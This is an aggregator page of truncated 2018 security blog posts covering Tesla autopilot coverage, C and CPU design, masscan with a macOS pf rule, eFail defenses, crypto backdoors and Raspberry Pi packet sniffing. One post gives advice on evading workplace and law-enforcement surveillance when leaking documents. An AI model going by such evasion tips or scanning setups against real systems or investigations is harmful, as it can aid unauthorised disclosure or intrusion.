don't demonstrate this.And then there is the truth calling it "autopilot" to begin with, because it isn't. The public is overrating the capabilities of the feature. It's little different than "lane keeping" and "adaptive cruise control" you can now find in other cars. In many ways, the technology is behind -- my Tesla doesn't beep at me when a pedestrian walks behind my car while backing up, but virtually every new car on the market does.Yes, the press unduly covers Tesla autopilot crashes, but Musk has only himself to blame by unduly exaggerating his car's capabilities by calling it "autopilot".What's "core truth" is thus rather difficult to obtain. What the press satisfies itself with instead is smaller truths, what they can document. The facts are in such cases that the accident happened, and they try to get Tesla or Musk to comment on it.What you can criticize a journalist for is therefore not "core truth" but whether they did journalism correctly. When such stories criticize "autopilot", but don't do their diligence in getting Tesla's side of the story, then that's a violation of journalistic practice. When I criticize journalists for their poor handling of stories in my industry, I try to focus on which journalistic principles they get wrong. For example, the NYTimes reporters do a lot of stories quoting anonymous government sources in clear violation of journalistic principles.If "credibility" is the concern, then it's the classic Bond villain h Tesla
ErrataRob.webp 2018-05-23 14:39:01 C is too low level (lien direct) I'm in danger of contradicting myself, after previously pointing out that x86 machine code is a high-level language, but this article claiming C is a not a low level language is bunk. C certainly has some problems, but it's still the closest language to assembly. This is obvious by the fact it's still the fastest compiled language. What we see is a typical academic out of touch with the real world.The author makes the (wrong) observation that we've been stuck emulating the PDP-11 for the past 40 years. C was written for the PDP-11, and since then CPUs have been designed to make C run faster. The author imagines a different world, such as where CPU designers instead target something like LISP as their preferred language, or Erlang. This misunderstands the state of the market. CPUs do indeed supports lots of different abstractions, and C has evolved to accommodate this.The author criticizes things like "out-of-order" execution which has lead to the Spectre sidechannel vulnerabilities. Out-of-order execution is necessary to make C run faster. The author claims instead that those resources should be spent on having more slower CPUs, with more threads. This sacrifices single-threaded performance in exchange for a lot more threads executing in parallel. The author cites Sparc Tx CPUs as his ideal processor.But here's the thing, the Sparc Tx was a failure. To be fair, it's mostly a failure because most of the time, people wanted to run old C code instead of new Erlang code. But it was still a failure at running Erlang.Time after time, engineers keep finding that "out-of-order", single-threaded performance is still the winner. A good example is ARM processors for both mobile phones and servers. All the theory points to in-order CPUs as being better, but all the products are out-of-order, because this theory is wrong. The custom ARM cores from Apple and Qualcomm used in most high-end phones are so deeply out-of-order they give Intel CPUs competition. The same is true on the server front with the latest Qualcomm Centriq and Cavium ThunderX2 processors, deeply out of order supporting more than 100 instructions in flight.The Cavium is especially telling. Its ThunderX CPU had 48 simple cores which was replaced with the ThunderX2 having 32 complex, deeply out-of-order cores. The performance increase was massive, even on multithread-friendly workloads. Every competitor to Intel's dominance in the server space has learned the lesson from Sparc Tx: many wimpy cores is a failure, you need fewer beefy cores. Yes, they don't need to be as beefy as Intel's processors, but they need to be close.Even Intel's "Xeon Phi" custom chip learned this lesson. This is their GPU-like chip, running 60 cores with 512-bit wide "vector" (sic) instructions, designed for supercomputer applications. Its first version was purely in-order. Its current version is slightly out-of-order. It supports four threads and focuses on basic number crunching, so in-order cores seems to be the right approach, but Intel found in this case that out-of-order processing still provided a benefit. Practice is different than theory.As an academic, the author of the above article focuses on abstractions. The criticism of C is that it has the wrong abstractions which are hard to optimize, and that if we instead expressed things in the right abstractions, it would be easier to optimize.This is an intellectually compelling argument, but so far bunk.The reason is that while the theoretical base language has issues, everyone programs using extensions to the language, like "intrinsics" (C 'functions' that map to assembly instructions). Programmers write libraries using these intrinsics, which then the rest of the normal programmers use. In other words, if your criticism is that C is not itself low level enou Guideline
ErrataRob.webp 2018-05-20 17:15:52 masscan, macOS, and firewall (lien direct) One of the more useful features of masscan is the "--banners" check, which connects to the TCP port, sends some request, and gets a basic response back. However, since masscan has it's own TCP stack, it'll interfere with the operating system's TCP stack if they are sharing the same IPv4 address. The operating system will reply with a RST packet before the TCP connection can be established.The way to fix this is to use the built-in packet-filtering firewall to block those packets in the operating-system TCP/IP stack. The masscan program still sees everything before the packet-filter, but the operating system can't see anything after the packet-filter.Note that we are talking about the "packet-filter" firewall feature here. Remember that macOS, like most operating systems these days, has two separate firewalls: an application firewall and a packet-filter firewall. The application firewall is the one you see in System Settings labeled "Firewall", and it controls things based upon the application's identity rather than by which ports it uses. This is normally "on" by default. The packet-filter is normally "off" by default and is of little use to normal users.Also note that macOS changed packet-filters around version 10.10.5 ("Yosemite", October 2014). The older one is known as "ipfw", which was the default firewall for FreeBSD (much of macOS is based on FreeBSD). The replacement is known as PF, which comes from OpenBSD. Whereas you used to use the old "ipfw" command on the command line, you now use the "pfctl" command, as well as the "/etc/pf.conf" configuration file.What we need to filter is the source port of the packets that masscan will send, so that when replies are received, they won't reach the operating-system stack, and just go to masscan instead. To do this, we need find a range of ports that won't conflict with the operating system. Namely, when the operating system creates outgoing connections, it randomly chooses a source port within a certain range. We want to use masscan to use source ports in a different range.To figure out the range macOS uses, we run the following command:sysctl net.inet.ip.portrange.first net.inet.ip.portrange.lastOn my laptop, which is probably the default for macOS, I get the following range. Sniffing with Wireshark confirms this is the range used for source ports for outgoing connections.net.inet.ip.portrange.first: 49152net.inet.ip.portrange.last: 65535So this means I shouldn't use source ports anywhere in the range 49152 to 65535. On my laptop, I've decided to use for masscan the ports 40000 to 41023. The range masscan uses must be a power of 2, so here I'm using 1024 (two to the tenth power).To configure masscan, I can either type the parameter "--source-port 40000-41023" every time I run the program, or I can add the following line to /etc/masscan/masscan.conf. Remember that by default, masscan will look in that configuration file for any configuration parameters, so you don't have to keep retyping them on the command line.source-port = 40000-41023Next, I need to add the following firewall rule to the bottom of /etc/pf.conf:block in proto tcp from any to any port 40000 >< 41024However, we aren't do
ErrataRob.webp 2018-05-14 09:05:47 Some notes on eFail (lien direct) I've been busy trying to replicate the "eFail" PGP/SMIME bug. I thought I'd write up some notes.PGP and S/MIME encrypt emails, so that eavesdroppers can't read them. The bugs potentially allow eavesdroppers to take the encrypted emails they've captured and resend them to you, reformatted in a way that allows them to decrypt the messages.Disable remote/external content in emailThe most important defense is to disable "external" or "remote" content from being automatically loaded. This is when HTML-formatted emails attempt to load images from remote websites. This happens legitimately when they want to display images, but not fill up the email with them. But most of the time this is illegitimate, they hide images on the webpage in order to track you with unique IDs and cookies. For example, this is the code at the end of an email from politician Bernie Sanders to his supporters. Notice the long random number assigned to track me, and the width/height of this image is set to one pixel, so you don't even see it:Such trackers are so pernicious they are disabled by default in most email clients. This is an example of the settings in Thunderbird:The problem is that as you read email messages, you often get frustrated by the fact the error messages and missing content, so you keep adding exceptions:The correct defense against this eFail bug is to make sure such remote content is disabled and that you have no exceptions, or at least, no HTTP exceptions. HTTPS exceptions (those using SSL) are okay as long as they aren't to a website the attacker controls. Unencrypted exceptions, though, the hacker can eavesdrop on, so it doesn't matter if they control the website the requests go to. If the attacker can eavesdrop on your emails, they can probably eavesdrop on your HTTP sessions as well.Some have recommended disabling PGP and S/MIME completely. That's probably overkill. As long as the attacker can use the "remote content" in emails, you are fine. Likewise, some have recommend disabling HTML completely. That's not even an option in any email client I've used -- you can disable sending HTML emails, but not receiving them. It's sufficient to just disable grabbing remote content, not the rest of HTML email rendering.I couldn't replicate the direct exfiltrationThere rare two related bugs. One allows direct exfiltration, which appends the decrypted PGP email onto the end of an IMG tag (like
ErrataRob.webp 2018-05-13 23:21:32 How to leak securely, for White House staffers (lien direct) Spencer Ackerman has this interesting story about a guy assigned to crack down on unauthorized White House leaks. It's necessarily light on technical details, so I thought I'd write up some guesses, either as a guide for future reporters asking questions, or for people who want to know how they can safely leak information.It should come as no surprise that your work email and phone are already monitored. They can get every email you've sent or received, even if you've deleted it. They can get every text message you've sent or received, the metadata of every phone call sent or received, and so forth.To a lesser extent, this also applies to your well-known personal phone and email accounts. Law enforcement can get the metadata (which includes text messages) for these things without a warrant. In the above story, the person doing the investigation wasn't law enforcement, but I'm not sure that's a significant barrier if they can pass things onto the Secret Service or something.The danger here isn't that you used these things to leak, it's that you've used these things to converse with the reporter before you made the decision to leak. That's what happened in the Reality Winner case: she communicated with The Intercept before she allegedly leaked a printed document to them via postal mail. While it wasn't conclusive enough to convict her, the innocent emails certainly put the investigators on her trail.The path to leaking often starts this way: innocent actions before the decision to leak was made that will come back to haunt the person afterwards. That includes emails. That also includes Google searches. That includes websites you visit (like this one). I'm not sure how to solve this, except that if you've been in contact with The Intercept, and then you decide to leak, send it to anybody but The Intercept.By the way, the other thing that caught Reality Winner is the records they had of her accessing files and printing them on a printer. Depending where you work, they may have a record of every file you've accessed, every intranet page you visited. Because of the way printers put secret dots on documents, investigators know precisely which printer and time the document leaked to The Intercept was printed.Photographs suffer the same problem: your camera and phone tag the photographs with GPS coordinates and time the photograph was taken, as well as information about the camera. This accidentally exposed John McAfee's hiding location when Vice took pictures of him a few years ago. Some people leak by taking pictures of the screen -- use a camera without GPS for this (meaning, a really old camera you bought from a pawnshop).These examples should impress upon you the dangers of not understanding technology. As soon as you do something to evade surveillance you know about, you may get caught by surveillance you don't know about.If you nonetheless want to continue forward, the next step may be to get a "burner phone". You can get an adequate Android "prepaid" phone for cash at the local Walmart, electronics store, or phone store.There's some problems with such phones, though. They can often be tracked back to the store that sold them, and the store will have security cameras that record you making the purchase. License plate readers and GPS tracking on your existing phone may also place you at that Walmart.I don't know how to resolve these problems. Perhaps the best is grow a beard and on the last day of your vacation, color your hair, take a long bike/metro ride (without y
ErrataRob.webp 2018-04-25 16:46:42 No, Ray Ozzie hasn\'t solved crypto backdoors (lien direct) According to this Wired article, Ray Ozzie may have a solution to the crypto backdoor problem. No, he hasn't. He's only solving the part we already know how to solve. He's deliberately ignoring the stuff we don't know how to solve. We know how to make backdoors, we just don't know how to secure them.The vault doesn't scaleYes, Apple has a vault where they've successfully protected important keys. No, it doesn't mean this vault scales. The more people and the more often you have to touch the vault, the less secure it becomes. We are talking thousands of requests per day from 100,000 different law enforcement agencies around the world. We are unlikely to protect this against incompetence and mistakes. We are definitely unable to secure this against deliberate attack.A good analogy to Ozzie's solution is LetsEncrypt for getting SSL certificates for your website, which is fairly scalable, using a private key locked in a vault for signing hundreds of thousands of certificates. That this scales seems to validate Ozzie's proposal.But at the same time, LetsEncrypt is easily subverted. LetsEncrypt uses DNS to verify your identity. But spoofing DNS is easy, as was recently shown in the recent BGP attack against a cryptocurrency. Attackers can create fraudulent SSL certificates with enough effort. We've got other protections against this, such as discovering and revoking the SSL bad certificate, so while damaging, it's not catastrophic.But with Ozzie's scheme, equivalent attacks would be catastrophic, as it would lead to unlocking the phone and stealing all of somebody's secrets.In particular, consider what would happen if LetsEncrypt's certificate was stolen (as Matthew Green points out). The consequence is that this would be detected and mass revocations would occur. If Ozzie's master key were stolen, nothing would happen. Nobody would know, and evildoers would be able to freely decrypt phones. Ozzie claims his scheme can work because SSL works -- but then his scheme includes none of the many protections necessary to make SSL work.What I'm trying to show here is that in a lab, it all looks nice and pretty, but when attacked at scale, things break down -- quickly. We have so much experience with failure at scale that we can judge Ozzie's scheme as woefully incomplete. It's not even up to the standard of SSL, and we have a long list of SSL problems.Cryptography is about people more than mathWe have a mathematically pure encryption algorithm called the "One Time Pad". It can't ever be broken, provably so with mathematics.It's also perfectly useless, as it's not something humans can use. That's why we use AES, which is vastly less secure (anything you encrypt today can probably be decrypted in 100 years). AES can be used by humans whereas One Time Pads cannot be. (I learned the fallacy of One Time Pad's on my grandfather's knee -- he was a WW II codebreaker who broke German messages trying to futz with One Time Pads).The same is true with Ozzie's scheme. It focuses on the mathematical model but ignores the human element. We already know how to solve the mathematical problem in a hundred different ways. The part we don't know how to secure it the human element.How do we know the law enforcement person is who they say they are? How do we know the "trusted Apple employee" can't be bribed? How can the law enforcement agent communicate securely with the Apple employee?You think these things are theoretical, but they aren't. Consider financial transactions. It used to be common that you could just email your bank/broker to wire funds into an account for such things as buying a house. Hackers have subverted that, intercepting messages, changing account numbers, Guideline
ErrataRob.webp 2018-04-22 19:25:25 OMG The Stupid It Burns (lien direct) This article, pointed out by @TheGrugq, is stupid enough that it's worth rebutting.“The views and opinions expressed are those of the author and not necessarily the positions of the U.S. Army, Department of Defense, or the U.S. Government.” Wannacry
ErrataRob.webp 2018-04-16 08:35:43 Notes on setting up Raspberry Pi 3 as WiFi hotspot (lien direct) I want to sniff the packets for IoT devices. There are a number of ways of doing this, but one straightforward mechanism is configuring a "Raspberry Pi 3 B" as a WiFi hotspot, then running tcpdump on it to record all the packets that pass through it. Google gives lots of results on how to do this, but they all demand that you have the precise hardware, WiFi hardware, and software that the authors do, so that's a pain.I got it working using the instructions here. There are a few additional notes, which is why I'm writing this blogpost, so I remember them.https://www.raspberrypi.org/documentation/configuration/wireless/access-point.mdI'm using the RPi-3-B and not the RPi-3-B+, and the latest version of Raspbian at the time of this writing, "Raspbian Stretch Lite 2018-3-13".Some things didn't work as described. The first is that it couldn't find the package "hostapd". That solution was to run "apt-get update" a second time.The second problem was error message about the NAT not working when trying to set the masquerade rule. That's because the 'upgrade' updates the kernel, making the running system out-of-date with the files on the disk. The solution to that is make sure you reboot after upgrading.Thus, what you do at the start is:apt-get updateapt-get upgradeapt-get updateshutdown -r nowThen it's just "apt-get install tcpdump" and start capturing on wlan0. This will get the non-monitor-mode Ethernet frames, which is what I want.
Last update at: 2024-05-02 18:07:54
See our sources.
My email:

To see everything: Our RSS (filtrered) Twitter